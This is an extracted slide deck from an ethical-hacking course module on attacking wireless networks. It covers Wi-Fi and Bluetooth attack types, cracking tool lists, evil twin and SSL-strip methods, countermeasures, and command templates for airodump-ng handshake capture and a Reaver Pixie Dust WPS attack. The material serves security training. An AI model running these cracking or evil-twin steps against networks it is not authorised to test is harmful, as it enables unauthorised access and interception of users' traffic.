Embed Size (px)
Citation preview
Ethical Hacking v10 Module 14 – Hacking Wireless Networks
Hacking Wireless Networks
Goals• Understand Wireless Concepts• Understand Wireless Encryption Algorithms• Understand Wireless Threats• Understand Wireless Hacking
Methodologies• Learn Wireless Hacking Tools• Understand Bluetooth Hacking Techniques• Understand Countermeasures to Wireless
Hacking• Learn Wireless Security Tools• Understand Wireless Penetration Testing
Module 14.0 Hacking Wireless Networks• 14.1 Wireless Concepts• 14.2 Wireless Discovery and Mapping• 14.3 Wi-Fi Sniffers• 14.4 Wi-Fi Attacks• 14.5 Wi-Fi Cracking• 14.6 Wireless Hacking Tools• 14.7 Bluetooth Hacking• 14.8 Wireless Hacking Countermeasures• 14.9 Wireless Security Tools• 14.10 Wireless Penetration Testing
14.1 Wireless Concepts
Wireless Network Basics
• Wireless Local Area Networks (WLAN)• Based on the IEEE 802.11 standard• Uses radio channels for communication• Devices connect to the network via a wireless network access point• Advantages• Disadvantages
Wireless Network Advantages and Disadvantages• Advantages• Fast, easy installation• Easy connectivity where cables can’t easily be used• Internet access from anywhere in range of access point• Free internet connections in many public places
• Disadvantages• Security is a concern• The more devices on the network the more bandwidth is compromised • Enhancements may need new wireless access points and/or wireless cards• Wi-Fi networks can be disrupted by some electronic equipment
Wireless Terminology
• GSM• Bandwidth• BSSID• ISM Band• Access Point• Hotspot• Association
• Orthogonal Frequency-division Multiplexing (OFDM)• Direct-sequence Spread Spectrum
(DSSS)• Frequency-hopping Spread
Spectrum (FHSS)
How are Wired and Wireless Networks Different?• Most wired exploits will also work against Wi-Fi wireless
• Sniffing• Spoofing• MITM/Hijacking• Deauthentication• DoS
• There are additional wireless LAN network technologies that have their own vulnerabilities• RFID• NFC• Bluetooth• Cellular
Wireless Network Types
• Extended to Wired Network• LAN-to-LAN Wireless Network• Multiple Access Points• 3G/4G Hotspot
Accessing Wireless Networks
• 802.11a• 802.11b• 802.11g• 802.11i• 802.11n• 802.11ac• 802.16 (WiMAX)• 802.15 (Bluetooth)
Service Set Identifier (SSID)
• A token used to identify a 802.11 network• A single, shared identifier located between client and access point• SSID is continuously broadcast from SSID• SSID consists of text that is human-readable• SSID on each host must be reconfigured when network SSID is changed• Clients can use non-secure access mode to access blank, configured, or
“any” SSID• Default values must be changed to ensure security• SSID is secret on closed networks
Authentication Modes for Wi-Fi
• Open-System Authentication Process• No key
• Shared-Key Authentication Process• Password is set on WAP and clients
• 802.1x • Typically the WAP is open• DHCP lease• Client browser opens/is redirected to a captive portal• Sometimes other protocols are permitted even if browser can’t connect• Login sent to a RADIUS/TACACS/TACACS+ server• Client caches short-term session token
Wi-Fi Chalking
• WarWalking: Attackers on foot use Wi-Fi-enabled laptops to identify open networks• WarChalking: Drawing symbols in public areas to indicate open
networks• WarFlying: Attackers use drones to identify open networks• WarDriving: Attackers use a vehicle to move around with Wi-Fi-
enabled laptops and identify open networks
Wi-Fi Chalking Symbols
• Free Wi-Fi• Wi-Fi with WEP• Wi-Fi with MAC Filtering• Wi-Fi with Multiple
Access Controls• Restricted Wi-Fi• Wi-Fi with Closed SSID• Pay for Wi-Fi• Wi-Fi Honeypot
Wireless Network Antennas
• Directional antenna• Omnidirectional antenna• Parabolic Grid antenna• Yagi antenna• Dipole antenna
14.2 Wireless Discovery and
Mapping
Wireless Discovery
• Attackers must first discover and footprint a wireless network• Active or Passive Footprinting a wireless network• Finding a wireless network:
• Attacker will first check all potential networks• Attacker will move around with wireless laptop to find active networks
Wireless Discovery Tools
• inSSIDer• NetSurveyor• Vistumbler• NetStumbler• WirelessMon• Kismet• WiFi Hopper• Wavestumbler
• iStumbler• WiFinder• Wellenreiter• AirCheck Wi-Fi Tester• AirRaider 2• Xirrus Wi-Fi Inspector• WiFi Finder• WeFi
InSSIDer Example
Mobile Wireless Discovery Tools
• WiFiFoFum-WiFi Scanner• WiFi Manager• Network Signal Info• OpenSignal Maps• Fing• Overlook WiFi
GPS Mapping
• Attacker makes map and database of Wi-Fi networks• Uses GPS to track Wi-Fi network location and uploads coordinates to
site• Attackers share or sell information
GPS Mapping Tools
• WiGLE• Skyhook• TamoGraph• WiFi Site Survey• Fluke Airmagnet
14.3 Wi-Fi Sniffers
Wireless Traffic Analysis
• Find Vulnerabilities• Do Wi-Fi Reconnaissance• Use Tool to Conduct Analysis• Select the appropriate card/chipset
Wireless Sniffing
• Use sniffers like Wireshark to obtain signals that traverse the air
• Interface will by default receive transmissions bound for it
• Put interface in promiscuous mode to capture all available transmissions
• Sniffing can enable eavesdropping on communications• More viable in open Wi-Fi• Encryption largely mitigates problems• Some information is sent in cleartext despite
encryption modes, such as MAC address• Use MAC address in spoofing attacks
Wireless Sniffing (cont’d)
• In WPA/WPA2 networks, use deauthentication to capture four-way handshake• Client must perform handshake when
reconnecting• Capture PSK exchanged in handshake• Try cracking PSK
• airodump-ng to sniff for handshake:• airodump-ng -c <channel> --bssid <MAC address> -w capture wlan0
Wi-Fi Packet Sniffers
• Wireshark with AirPcap• SteelCentral Packet Analyzer• OmniPeek Network Analyzer• CommView for Wi-Fi• Sniffer Portable Professional
Analyzer• Capsa• PRTG Network Monitor
• ApSniff• NetworkMiner• Airview• Observer• WifiScanner• Mognet• AirTraf
14.4 Wi-Fi Attacks
Wireless Threats
• Access Control Attack• Integrity Attack• Confidentiality Attack• Availability Attack• Authentication Attack• Rogue Access Point Attack• Client Mis-association• Misconfigured WAP• Unauthorized Association
• Ad Hoc Connection Attack• HoneySpot Access Point Attack• AP MAC Spoofing• DoS Attack• Jamming Signal Attack• Wi-Fi-Jamming Devices• MITM• Evil Twin
Launch Wireless Attacks
• Aircrack-ng Suite• Reveal Hidden SSIDs• Fragmentation Attack• MAC Spoofing Attack• Deauthentication Attack• Disassociation Attack• Man-in-the-Middle Attack• MITM Attack using Aircrack-ng
• Wireless ARP Poisoning Attack• Rogue Access Point• Evil Twin
Evil Twin Attacks
• Evil Twin Attacks are a type of attack where a rogue access point attempts to deceive users into believing that it is a legitimate access point• A form of social engineering• Often facilitated through
deauthentication• Attacker knocks client off real
network• Client reconnects to rogue AP
• Can launch all manner of attacks against connected victim
Evil Twin Attacks (cont’d)
• Effective because it's not always easy to determine the correct network• Real and fake can have same SSID• Can use same encryption protocol• Fake can be placed close to victim so it
shows up as a strong signal• Evil twins are usually open so as not to require
a password• Specific attacks leverage evil twin to make it
more effective
Evil Twin Attacks (cont’d)• Karma attack:• Some client devices send out probe
requests for known Wi-Fi networks• Doesn't wait passively for AP to send
beacon frame• Attacker listens for request and responds
with their rogue AP• Client doesn't need to be close to real AP• Attacker doesn't need to broadcast
spoofed SSID
Evil Twin Attacks (cont’d)• Downgrade attack:• Also called SSL strip• Entice victim to connect to evil twin• Victim navigates to HTTPS site• Evil twin acts as a proxy with secure
connection to site• Site responds, proxy intercepts
response, modifies it to use HTTP• Proxy forwards response to user,
who believes they have a secure connection• User's transmissions sent in
cleartext back to proxy
WiFi-Pumpkin Evil Twin Example
14.5 Wi-Fi Cracking
WEP Cracking
• Weak implementation of RC4 algorithm• Uses Initialization Vectors IVs to stretch the pre-shared key• IV pseudo-random generation has a bias• Can run a statistical analysis if you capture enough Ivs• 20,000 IVs for 40-bit key (64-bit encryption)• 40,000 IVs for 104-bit key (128-bit encryption)
• No digital signatures• No sequencing• Can capture a client ARP request and replay to accelerate IV generation
• Chosen ciphertext attack• Replay attack
WEP Cracking Example
WPA/WPA2 Cracking
• Introduced TKIP (key rotation)• Uses much stronger encryption (AES/CCMP)• Uses sequence numbers so replay can’t be used • Still susceptible to dictionary attack• WPA2 KRACK Attack forces the WAP to “reinstall” a zero length key• Done during WPA2 handshake• Key is installed several times• Can be forced down if key is believed to be “dropped”
WPA2 Enterprise
• 802.1x• RADIUS server
Wi-Fi Protected Setup (WPS) Attacks
The image part with relationship ID rId1 was not found in the file.
WPS is an attempt to streamline Wi-Fi
setup/device enrollment
The image part with relationship ID rId3 was not found in the file.
Clients use 8-digit PIN to connect.
Each PIN half is calculated separately
Only 11,000 possible valuesEasy to crack within hours
The image part with relationship ID rId5 was not found in the file.
Lockout policies can hamper PIN cracking online
Might take a couple weeks, but still feasible
Lockout may look for MAC address, so spoofing could be
used to bypassBrute forcing may trigger DoS on
certain WAPs
WPS Exploits
The image part with relationship ID rId1 was not found in the file.
Pixie Dust offline PIN cracking:
- Recover PIN in minutes- Several values create two hashes AP uses to authenticate to client- Nonces E-S1 and E-S2 may be weak in some vendors' APs- Nonces + PIN + other values = hashes- If nonces are known, you can match hashes to discover the PIN
The image part with relationship ID rId3 was not found in the file.
Reaver Pixie Dust attack:reaver -i wlan0 -b <AP MAC> -c <AP channel> -K 1
Cracking Wireless Encryption – WPA/WEP Cracking Tools• Aircrack-ng• Besside-ng• KisMAC• Cain & Abel• Elcomsoft Wireless Security Auditor• WepAttack• Wesside-ng• Reaver Pro• WEPCrack• WepDecrypt
• Portable Penetrator• CloudCracker• coWPAtty• Wifite• WepCrackGui• Penetrate Pro• Fern WiFi Cracker
WPS Reaver Attack Example
14.6 Wireless Hacking Tools
Sniffers
• Kismet• Wireshark• Airodump-ng• Vericode• Monitis
Wardriving Tools
• Airbase-ng• ApSniff• WiFiFoFum• MiniStumbler• WarLinux• MacStumbler• WiFi-Where• AirFart• AirTraf• 802.11 Network Discover Tools
Monitors
• NetworkManager• KWiFiManager• NetworkControl• Sentry Edge II• WaveNode• xosview• RF Monitor• DTC-340 RFXpert• RF Explorer• Home Curfew RF Monitoring System• SigMon
Analyzer Tools
• AirMagnet WiFi Analyzer• OptiView XG Network Analysis Tablet• Observer• Ufasoft Snif• vxSniffer• OneTouch AT Network Assistant• Capsa Network Analyzer• SoftPerfect Netowrk Protocol Analyzer• OmniPeek Network Analyzer• CommView for WiFi
Packet Capturing Tools
• WirelessNetView• Tcpdump• Airview• RawCap• Airodump-ng
Spectrum Analysis Tools
• Cisco Spectrum Expert• AirMedic USB• AirSleuth-Pro• BumbleBee-LX Spectrum Analyzer• Wi-Spy
MITM / Evil Twin Tools
• Karma• Wi-Fi Pumpkin• Wi-Fi Pineapple
Mobile Hacking Tools
• WiHack• Backtrack Simulator• Wps Wpa Tester
14.7 Bluetooth Hacking
Bluetooth Modes
• Discoverable Modes:• Discoverable• Limited Discoverable• Non-discoverable
• Pairing Modes• Non-pairable• Pairable
Bluetooth Threats
• Leaking Personal Information• Controlling Device Remotely• Device Bugging• Social Engineering• Sending False SMS Messages• Introduction of Malicious Code• Hiking Up Phone Bill Causing Financial Stress• Taking Advantage of Vulnerabilities in Protocols
Bluetooth Attacks
• Bluejacking• Sending unsolicited messages to Bluetooth-enabled devices
• Bluesnarfing• Unauthorized information access on a device
• Bluebugging• Unauthorized system access to a device
• BlueBorne• Collection of overflow attacks that could result in arbitrary code execution• Pairing and discoverability are not required on the target• Requires no user interaction
Bluesnarfing Example
Bluetooth Attacks (cont’d)
• Bluesmacking• DoS
• BluePrinting• Remotely discover details about Bluetooth enabled devices
• MAC Spoofing Attack• Man-in-the-Middle/Impersonation Attack
Bluetooth Hacking Tools
• PhoneSnoop• BlueScanner• BH BlueJack• Bluesnarfer• btCrawler• Bluediving• Blooover II• btscanner
• CIHwBT• BT Audit• Blue Alert• Blue Sniff
14.8 Wireless Hacking
Countermeasures
Defending Against Bluetooth Hacking
• Ensure PIN keys use non-regular patterns• Ensure device is always in hidden mode• Keep track of all past paired devices and delete suspicious devices• Ensure BT is kept disabled unless required• Never accept pairing requests from unknown devices• Ensure encryption is enabled when connecting to a PC
Defending Against Bluetooth Hacking (cont’d)
• Keep device network range at its lowest• Only pair with other devices in a secure area• Ensure antivirus is installed• Ensure default security settings are changed to the best possible
standard• Ensure all BT connections use Link Encryption• Ensure encryption is empowered for multiple wireless
communications
Wireless Security Layers
• Connection Security• Wireless Signal Security• Device Security• End-user Protection• Data Protection• Network Protection
Defending Against Wireless Attacks
Configuration Best Practices:• Ensure default SSID is changed once WLAN is configured• Ensure remote router login is disabled• Ensure router access password is set and firewall protection is
enabled• Ensure MAC Address filtering is enabled on routers/access points• Ensure SSID broadcasts are disabled at access points and passphrase
is changed frequently
Defending Against Wireless Attacks (cont’d)
SSID Settings Best Practices:• Always use SSID cloaking• Keep passphrases free of SSID, network/company name, or anything
that is easy to figure out• Ensure there is a firewall/packet filter between AP and Intranet• Keep wireless network strength low enough avoid detection outside
organization• Regularly ensure there are no issues with setup/configuration• Use extra traffic encryption
Defending Against Wireless Attacks (cont’d)
Authentication Best Practices:• Use WPA instead of WEP• Ensure access points are in secure locations• Use WPA2 if possible• Ensure all wireless drivers are up-to-date• Ensure network is disabled when it isn’t needed• Ensure authentication via a centralized server
14.9 Wireless Security Tools
Wireless Security Auditing Tools
• AirMagnet WiFi Analyzer• Motorola’s AirDefense Services Platform (ADSP)• Adaptive Wireless IPS• Aruba RFProtect
Wireless Intrusion Prevention Systems
• Extreme Networks Intrusion Prevention System• AirMagnet Enterprise• Dell SonicWALL Clean Wireless• HP TippingPoint NX Platform NGIPS• AirTight WIPS• Network Box IDP• AirMobile Server• Wireless Policy Manager (WPM)• ZENworks Endpoint Security Management• FortiWiFi
Wireless Predictive Planning Tools
• AirMagnet Planner• Cisco Prime Infrastructure• AirTight Planner• LANPlanner• RingMaster• Connect EZ Predictive RF CAD Design• Ekahau Site Survey (ESS)• ZonePlanner• Wi-Fi Planning Tool• TamoGraph Site Survey
Wireless Vulnerability Scanning Tools
• Zenmap• Nessus• OSWA-Assistant• Network Security Toolkit• Nexpose Community Edition• WiFish Finder• Penetrator Vulnerability Scanning Appliance• SILICA• WebSploit• Airbase-ng
Bluetooth Security Tools
• No automatic pairing• Turn off discovery• Bluetooth Firewall
Mobile Wi-Fi Security Tools
• WiFi Protector• WiFiGuard• Wifi Inspector
14.10 Wireless Penetration
Testing
Steps to Penetration Testing Wireless
• Discover WAPs with Airmon-ng• Query WAPs for protocols• Use directional antennas for better signal gain• Use Wireshark to capture unencrypted traffic• Use Aircrack-ng suite, Fern Wi-Fi, or Bessiden-ng to crack WEP, WPA,
WPA2• Use Karma for MITM attacks• Use Reaver/Pixie Dust to crack WPS• Use social engineering/evil twins to capture user passwords wirelessly
Wireless Hacking Review
• IEEE 802.11 Wi-Fi networks used for data transfer/communication across radio network• Wi-Fi infrastructure made of software and
hardware• Most used encryption WPA, WPA2, and WEP –
WPA2 most secure• WEP uses 24-bit IV, stream cipher RC4, and
CRC-32 checksum• WPA uses TKIP, stream cipher RC4 128-bit and
62-bit keys; WPA2 uses 256-bit key with AES encryption• WEP is vulnerable to analytical attacks• Countermeasures to Wi-Fi attack are wireless
IDS systems and best practices for configuration, SSID, and authentication
Penetrating Wireless Networks Review
• Use aircrack-ng to crack keys on Wi-Fi networks secured with WEP• Use a replay attack to obtain a repeated
24-bit IV• Speed up WEP cracking with a
fragmentation attack using aireplay-ng• Use the PRGA obtained from fragmentation
to craft a packet with packetforge-ng• Send a crafted packet to an AP to easily
obtain thousands of IVs• Check the laws in your area before using
radio jamming devices
Penetrating Wireless Networks Review (cont’d)
• Use a tool like aireplay-ng to knock clients off a WAP
• Spoof MAC addresses in deauthenticationattacks
• Use evil twins to entice users to connect to your rogue AP
• Use Karma attacks by sending a probing request to trick client into connecting to evil twin
• Use SSL strip with evil twin to downgrade a user's HTTPS session
• Place your wireless interface in promiscuous mode to receive all available signals
• Use airodump-ng to sniff four-way wireless handshake for WPA/WPA2 key cracking
Penetrating Wireless Networks Review (cont’d)
• Use online brute forcing to crack a WPS PIN• Use Pixie Dust attack to conduct offline
cracking of vulnerable APs• Use bluejacking to send unsolicited messages
to discoverable Bluetooth devices• Use bluesnarfing to read sensitive information
from discoverable Bluetooth devices• Use bluebugging to gain system access to a
Bluetooth enabled device• Use blueborne to gain access to a Bluetooth
enabled device without involving the victim
Lab 14: Hacking Wireless
